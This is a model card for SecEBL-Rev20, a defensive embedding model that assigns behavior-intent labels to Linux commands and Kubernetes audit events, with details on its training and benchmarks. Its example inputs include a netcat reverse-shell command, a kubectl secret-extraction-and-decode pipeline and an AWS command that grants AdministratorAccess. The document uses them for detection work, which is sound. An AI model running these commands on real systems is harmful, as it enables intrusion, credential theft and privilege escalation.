SecEBL-Rev20

SecEBL stands for Security Event Behavior Labeler.

SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a Linux command line or normalized Kubernetes AuditLog event into ranked behavior-intent labels, so downstream detection can reason about what an actor is trying to do instead of only matching fixed strings, allowlists, blacklists, or opaque risk scores.

Project repository: github.com/EBWi11/SecEBL

At A Glance

Area Current release summary
Stable public API L1 behavior-intent labeling with ranked top_labels.
Behavior vocabulary 361 Rev20 behavior-intent tags across 12 security behavior groups.
Training scale 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs.
Corpus breadth Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling.
Benchmark scale 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream.
L1 accuracy 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set.
Inference performance RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s.
Training setup Alibaba-NLP/gte-modernbert-base, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours.

The public examples include a reviewed, publicly releasable subset of the internal Linux final benchmark plus normalized Kubernetes AuditLog examples: 10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They exist so users can run the model locally and inspect outputs without access to private telemetry. The full training corpora, full internal benchmarks, private pressure-stream rows, and private run logs are not redistributed because parts of them contain real telemetry or real operational context.

First-Time User Path

Use the companion GitHub repository for the runnable code and this Hugging Face repository for model artifacts:

git clone https://github.com/EBWi11/SecEBL.git
cd SecEBL

git lfs install
git clone https://huggingface.co/willchen0011/SecEBL model_artifacts

pip install -e .
scripts/run_examples.sh

After the script finishes, inspect:

runs/examples/linux_l1/predictions.jsonl
runs/examples/l2/example_linux_session_results.json

L1 is the stable behavior-labeling API. It outputs ranked behavior evidence, not an intrusion verdict. L2 is optional and experimental; it runs only when an L2 artifact such as model_artifacts/l2_artifacts/logreg.joblib is available.

What This Repository Contains

This Hugging Face repository is the model artifact bundle.

Path Purpose
model.safetensors, tokenizer/config files SentenceTransformers-compatible SecEBL-Rev20 embedding model.
semantic_texts.jsonl Rev20 semantic label texts used by the L1 retrieval path.
schema/tags_schema_rev20.json Canonical Rev20 behavior vocabulary, 361 tags across 12 groups.
examples/linux/ Public subset of the internal Linux final benchmark and matching Rev20 labels.
examples/k8s/ Public normalized Kubernetes AuditLog examples and matching Rev20 labels.
examples/manifest.json Public example subset counts and distribution.
rev20_tag_rfc.md Rev20 behavior-tag labeling RFC and boundary examples.
l2_artifacts/logreg.joblib Experimental L2 logistic-regression session scorer.
l2_artifacts/tag_risk_policy.rev20.json Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction.
l2_artifacts/train_summary.json Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers.
LICENSE, NOTICE Model license and attribution notices.

This repository does not include the runnable helper scripts. Use EBWi11/SecEBL for the Python package and one-command test script. The same public benchmark-subset examples are included here for convenience.

Output Shape

L1 predictions expose ranked top_labels:

{
  "observation_id": "event:0",
  "command": "nc -e /bin/sh 203.0.113.10 4444",
  "top_labels": [
    {
      "label_id": "spawn_reverse_shell",
      "score": 0.811,
      "axis": "execution_and_process"
    },
    {
      "label_id": "connect_external_service",
      "score": 0.488,
      "axis": "network"
    }
  ]
}

L1 does not emit behavior_tags and does not apply a user-facing tag-selection threshold. behavior_tags[] is the field used by training and evaluation label files. Runtime prediction output is ranked top_labels.

Why Intent Labels Matter

Traditional IDS pipelines often depend on signatures, rules, allowlists, blacklists, and low-explainability tabular ML. Those tools still matter, but they can struggle when legitimate tools are used in suspicious ways, when tool syntax drifts quickly, or when the same behavior appears in different telemetry formats.

SecEBL adds an intermediate representation:

raw security event
  -> L1 behavior-intent recognition
  -> L2 session reasoning or another downstream detector
  -> alert / review / policy

L1 intentionally does not decide that a single event is an intrusion. It produces explainable behavior evidence such as read_credential_material, execute_remote_command, create_scheduled_task, grant_cluster_privilege, or query_service_health.

This is useful for:

  • LOLT / living-off-the-land behavior where the tool is legitimate but the behavior may be suspicious in context.
  • Rule-writing lag, where new tool syntax appears faster than signatures can be maintained.
  • Multi-platform telemetry, where Linux commands, Kubernetes audit events, and future telemetry can share a behavior vocabulary.
  • Explainable detection, where an alert should be tied to explicit behavior labels rather than only an opaque score.

Data And Vocabulary

Rev20 is a flat behavior-tag schema.

Item Count
Top-level behavior groups 12
Behavior tags 361

Schema groups:

Group Tags
observation_and_discovery 51
configuration_and_log_modification 12
filesystem_and_data 33
execution_and_process 28
network 51
identity_auth_and_secrets 31
persistence_services_and_storage 27
kernel_memory_and_tracing 14
package_build_and_source 19
database_and_infrastructure_services 33
containers_and_cloud_native 34
cloud_control_plane 28

The release baseline was trained from internal Rev20 corpora:

Corpus Rows Unique behavior tags Notes
Linux command corpus 85,277 361 Mixed generated, reviewed, and manually expanded command examples.
Kubernetes AuditLog corpus 1,008 40 Manually authored normalized K8s audit events.

The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a conservative executable-name estimate. Common families include shell utilities, network tools, package/build tools, cloud CLIs, IaC tools, container tooling, databases, secret stores, and Kubernetes tooling.

Training Details

The raw training corpora are not redistributed, but the following details are documented so readers can understand the model scale and method.

Item Value
Base model Alibaba-NLP/gte-modernbert-base
Training objective MultipleNegativesRankingLoss with hard-negative-aware batches
Training hardware NVIDIA GeForce RTX 5090, 32GB VRAM, cuda:0
Epochs 128 full-pass epochs
Batch size 112
Precision fp32
Steps 1,062 steps per epoch; 135,936 total optimizer steps
Runtime 58,291 seconds, about 16.2 hours
Sequence length 160 tokens
Optimizer schedule learning rate 2e-5, warmup ratio 0.06, 8,156 warmup steps, weight decay 0.01

Training data scale:

Training artifact Count Notes
Combined corpus rows 86,285 85,277 Linux command rows plus 1,008 K8s AuditLog rows.
Non-empty training observations 82,895 Rows with usable behavior labels after skipping 3,390 abstain rows.
Base command-tag pairs 117,092 Positive command/tag pairs before boundary upsampling.
Effective positive pairs 118,858 Final pair count after targeted boundary upsampling.
Behavior labels 361 Full Rev20 behavior vocabulary used on the label side.

The Linux corpus is intentionally mixed rather than a single synthetic source. The largest source slices are roughly 36.9k generated rows, 28.5k manually reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack batch rows, plus smaller targeted boundary, miss-review, public-attack, and high-miss batches.

Token lengths are short enough for a compact encoder. Across the final pair set, command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than 0.3% of examples exceed the 160-token training limit. Label-side semantic texts are p50 40 tokens and p95 62.

Hard negatives were designed in two layers:

  • Schema-level negatives: the dataset builder used schema_hard, with a 16-item hard-negative pool and up to 8 negatives per positive before MNRL batching. These negatives come from semantically nearby Rev20 tags, so the model is forced to separate labels such as read-vs-search, inspect-vs-modify, local-vs-remote execution, and similar tool-boundary cases.
  • Batch-level negatives: the training loader used hard-negative-aware MNRL batches. The final run used config rev20_conservative_20260620_ep96_miss_v11, covering 74 difficult labels and placing 2 hard-negative labels near each anchor where possible.
  • Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once, producing 1,766 extra training exposures. These rows target recurring failure modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries, no-hit review cases, and post-evaluation miss-review batches.

Public Benchmark Subset

This Hugging Face repository includes the same public benchmark examples as the companion GitHub repository: the Linux benchmark subset under examples/linux/ and normalized Kubernetes AuditLog examples under examples/k8s/.

Public artifact Rows Sessions Notes
examples/linux/example_sessions.jsonl 10,520 531 Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows.
examples/linux/example_gold.rev20.jsonl 10,520 531 Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags.
examples/k8s/example_sessions.jsonl 144 46 Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows.
examples/k8s/example_gold.rev20.jsonl 144 46 Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags.

Session-level labels use English enums: normal_operation and intrusion. The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions, and complete 361-tag coverage.

Evaluation Snapshot

The full internal benchmark data is not public. The aggregate size, distribution, and metrics are public so users can understand what the headline numbers mean.

Evaluation scale:

Dataset Rows Rows with labels Behavior-tag instances Unique behavior tags
Linux internal benchmark 12,594 11,889 17,287 361 / 361
K8s evaluation set 144 144 163 27 / 361
Combined 12,738 12,033 17,450 361 / 361

Retrieval quality:

Dataset Dynamic exact Top5 any-hit Top5 all-covered Micro recall@5
Linux internal benchmark 87.32% 98.49% 95.44% 96.44%
K8s evaluation set 99.31% 100.00% 100.00% 100.00%
Combined 87.47% 98.50% 95.50% 96.47%

The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes complex multi-tag command rows. The K8s result should be read as a small-domain sanity result rather than broad Kubernetes coverage because the current K8s corpus is much smaller than the Linux corpus.

Internal Linux benchmark tag cardinality:

Tags per row Rows
0 705
1 8,829
2 1,567
3 901
4 402
5 139
6+ 51

Top internal Linux benchmark tags:

Tag Count
stage_temporary_path 987
inspect_network_state 801
stage_hidden_path 655
inspect_current_identity 578
read_credential_material 551
inspect_system_state 481
inspect_infrastructure_service 390
query_dns_records 372
enumerate_filesystem 365
search_credentials 315

Example Outputs

These examples show the user-facing L1 output style. Scores are cosine/retrieval scores after the release prompt profile. The public helper scripts save top labels in predictions.jsonl.

Event Top 3 L1 tags Note
nc -e /bin/sh 203.0.113.10 4444 spawn_reverse_shell 0.811
connect_external_service 0.488
spawn_bind_shell 0.451
-e is recognized as reverse-shell execution.
nc -v 203.0.113.10 443 connect_external_service 0.732
spawn_reverse_shell 0.503
create_reverse_tunnel 0.412
Connection intent ranks above shell-spawn intent.
cat /root/install.log read_business_log 0.641
read_system_log 0.431
read_workload_logs 0.385
Log-read semantics dominate.
cat /root/install.conf read_infrastructure_config 0.620
read_system_config 0.612
read_kernel_parameter 0.336
Config-read semantics dominate.
kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} | base64 -d read_cluster_secret 0.730
decode_data 0.716
read_credential_material 0.363
K8s secret extraction and decoding.
aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess grant_cloud_privilege 0.838
modify_cloud_identity_policy 0.535
modify_cloud_identity 0.459
Cloud privilege escalation semantics.
curl -fsS http://127.0.0.1:8080/healthz query_service_health 0.840
inspect_local_kubernetes_cluster 0.459
inspect_container_runtime 0.383
Local service health check.

Runtime Performance

SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20 tag definitions. The serving path embeds the event, embeds or loads tag definition embeddings, then ranks tags by similarity.

Current single-card CUDA recommendation:

Setting Value
Precision FP16
Attention SDPA
max_seq_length 160
Batch size 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default
Sorting sort_by=char
Padding dynamic, no forced pad alignment
Output path GPU tensor output plus GPU top-k

Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:

Mode Throughput
Recommended no-cache unique inference, bs224 mean 5,308.72 unique cmdlines/s
Recommended no-cache latency, bs224 about 0.1884 ms per unique cmdline
bs224 repeat range 5,025.47 - 5,433.78 unique cmdlines/s
Best quick-sweep point, bs384 5,378.45 unique cmdlines/s

Exact raw-event cache lookup was measured separately at mean 1,817,462.76 rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.

L2 Artifact

This repository includes an experimental fitted L2 session scorer so the companion GitHub scripts/run_examples.sh can run the public Linux and K8s L1 examples, plus Linux example-session scoring, when this model directory is used as MODEL_DIR.

In this release, a session is a sequence of events grouped by session_id. L1 labels each event independently. L2 scores the whole session by aggregating cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions, and routine-operation context. The L2 output is a session-level verdict such as intrusion or normal_operation, not a replacement for per-command behavior tags.

For compatibility with the released L2 artifact, L2 derives its session features from cached L1 top_labels using an internal selected-tag feature path. In plain terms, L2 filters the cached ranked labels inside its own feature builder before session scoring. This does not change L1 prediction output: users still receive ranked top_labels, not a selected behavior_tags field.

Runtime L2 does not use raw command text, user names, host names, or session ids as scoring features. Session ids may appear in private data-prep workflows for label assignment, but they are not runtime allow/deny lists.

Internal L2 summary:

Check Result
Withheld Linux session benchmark 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN
7M pressure-stream fit-check 6,286,568 rows, 102,117 sessions, 61 alert sessions
OOF validation 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall

The 7M pressure-stream result was measured on real background telemetry plus embedded synthetic attack sessions. The underlying rows and real session identifiers are not redistributed. The included L2 artifact is a research/reproducibility component, not a general production IDS claim.

Direct SentenceTransformers Loading

You can load the embedding model directly:

from sentence_transformers import SentenceTransformer

model = SentenceTransformer("willchen0011/SecEBL")

Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler: encode the event, encode or load the Rev20 semantic label texts from semantic_texts.jsonl, rank labels by cosine similarity, and save the top-k labels. For normal use, prefer the companion GitHub helpers because they keep the prompt profile, semantic text loading, top-k output format, and optional L2 feature path aligned with this release.

Intended Use

  • Research and evaluation of security-event behavior labeling.
  • Internal security detection, investigation, and triage for systems an organization owns, operates, administers, or is explicitly authorized to defend.
  • Building session-level risk scoring over SecEBL behavior-label streams.

Out Of Scope

  • Standalone verdicting on a single event.
  • Authorization or policy-compliance decisions without human validation.
  • Monitoring systems you are not authorized to defend.
  • Commercial security products, SaaS/API offerings, MDR/MSSP services, or third-party managed detection without a separate written commercial license.

License

The model artifacts are released under SecEBL Model License 1.0. This is an open-weight restricted-use model license, not Apache-2.0 and not an OSI-approved open source license.

The base model is Alibaba-NLP/gte-modernbert-base, which is Apache-2.0. Source code, schemas, public examples, public documentation, and helper scripts in the companion GitHub repository (EBWi11/SecEBL) are Apache-2.0 unless a file explicitly states otherwise. Public examples and documentation included in this Hugging Face repository follow that same companion-repository licensing unless a file explicitly states otherwise.

Commercial security offerings require a separate written commercial license.

Downloads last month
-
Safetensors
Model size
0.1B params
Tensor type
F32
·
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

Model tree for willchen0011/SecEBL

Finetuned
(34)
this model